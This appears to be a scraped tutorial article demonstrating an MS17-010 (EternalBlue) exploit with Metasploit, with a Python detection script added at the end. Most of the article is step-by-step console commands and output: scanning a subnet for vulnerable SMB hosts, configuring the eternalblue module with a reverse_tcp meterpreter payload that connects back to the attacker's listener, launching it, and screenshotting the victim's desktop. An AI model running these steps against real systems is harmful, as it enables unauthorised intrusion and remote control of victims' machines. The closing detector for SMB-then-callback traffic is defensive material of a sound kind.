Demonstration of exploiting MS17-010 using MSF

2025-01-16 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Process:

1. Scanning: information gathering (reconnaissance)

2. Vulnerability exploitation

First, detect the hosts in the network segment that have the vulnerability.

Use the commands:

    msf > use auxiliary/scanner/smb/smb_ms17_010 // load the scan module
    msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24 // configure the scan segment
    msf auxiliary(scanner/smb/smb_ms17_010) > run // scan

The results are as follows:

Second, vulnerability exploitation

In msf, use the following commands:

    msf > use exploit/windows/smb/ms17_010_eternalblue // load the module
    msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25 // configure the target IP
    RHOSTS => 192.168.22.25
    msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146 // configure the local IP
    LHOST => 192.168.5.146
    msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp // configure the connect-back mode
    payload => windows/x64/meterpreter/reverse_tcp
    msf exploit(windows/smb/ms17_010_eternalblue) >

View the currently configured payload

    msf exploit(windows/smb/ms17_010_eternalblue) > show options // view configuration options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

       Name                Current Setting  Required  Description
       ----                ---------------  --------  -----------
       GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
       GroomDelta          5                yes       The amount to increase the groom count by per try.
       MaxExploitAttempts  3                yes       The number of times to retry the exploit.
       ProcessName         spoolsv.exe      yes       Process to inject payload into.
       RHOST               192.168.22.25    yes       The target address
       RPORT               445              yes       The target port (TCP)
       SMBDomain           .                no        (Optional) The Windows domain to use for authentication
       SMBPass                              no        (Optional) The password for the specified username
       SMBUser                              no        (Optional) The username to authenticate as
       VerifyArch          true             yes       Check if remote architecture matches exploit Target.
       VerifyTarget        true             yes       Check if remote OS matches exploit Target.

    Payload options (windows/x64/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.5.146    yes       The listen address
       LPORT     4444             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs

    msf exploit(windows/smb/ms17_010_eternalblue) >

Run the exploit:

Command:

    msf exploit(windows/smb/ms17_010_eternalblue) > exploit // run the exploit

Capture the target's desktop:

    meterpreter > screenshot
    Screenshot saved to: /root/RBDEvfGv.jpeg // the screenshot of the target's computer can be viewed in the root directory

Get shell access

For more techniques for obtaining permissions, search Baidu yourself for msf's own modules.
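On the defensive side, the session above leaves a recognisable network pattern: a peer connects to TCP 445 on a host, and shortly afterwards that host connects back to the same peer (the reverse_tcp payload, LPORT 4444 and ProcessName spoolsv.exe in the options shown). The following is an added example, not part of the original article, that correlates this pattern over connection records; the record format, the 60-second window and all sample lines are constructed assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # assumed correlation window
DEFAULT_LPORT = 4444             # LPORT from the article's "show options"
INJECT_PROC = "spoolsv.exe"      # ProcessName from the article's "show options"

# Constructed sample records, assumed format:
# "timestamp src_ip dst_ip dst_port process" (process owns the socket on src, "-" if unknown)
SAMPLE_LOG = """\
2025-01-16T10:00:01 192.168.5.146 192.168.22.25 445 -
2025-01-16T10:00:09 192.168.22.25 192.168.5.146 4444 spoolsv.exe
2025-01-16T10:01:00 192.168.22.30 192.168.22.25 445 -
2025-01-16T10:10:00 192.168.22.25 192.168.22.30 8080 svchost.exe
2025-01-16T10:06:00 192.168.22.40 192.168.22.41 445 -
2025-01-16T10:06:05 192.168.22.41 192.168.22.40 49800 chrome.exe
malformed line here
"""

def parse(log):
    """Yield (time, src, dst, dport, process) tuples, skipping malformed lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 5 or not parts[3].isdigit():
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        yield ts, parts[1], parts[2], int(parts[3]), parts[4].lower()

def find_connect_backs(log):
    """Return findings where an SMB server calls back the peer that just connected to it."""
    smb_seen = {}   # (client, server) -> time of the latest inbound 445 connection
    findings = []
    for ts, src, dst, dport, proc in sorted(parse(log)):
        if dport == 445:
            smb_seen[(src, dst)] = ts
            continue
        started = smb_seen.get((dst, src))   # did dst recently open SMB to src?
        if started is not None and ts - started <= WINDOW:
            strong = proc == INJECT_PROC or dport == DEFAULT_LPORT
            findings.append({"host": src, "peer": dst, "port": dport, "process": proc,
                             "severity": "high" if strong else "review"})
    return findings

if __name__ == "__main__":
    for finding in find_connect_backs(SAMPLE_LOG):
        print(finding)
```

A "review" finding only means a connect-back happened inside the window; the port and process are operator-configurable, so the 445-then-callback ordering is the more durable signal.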
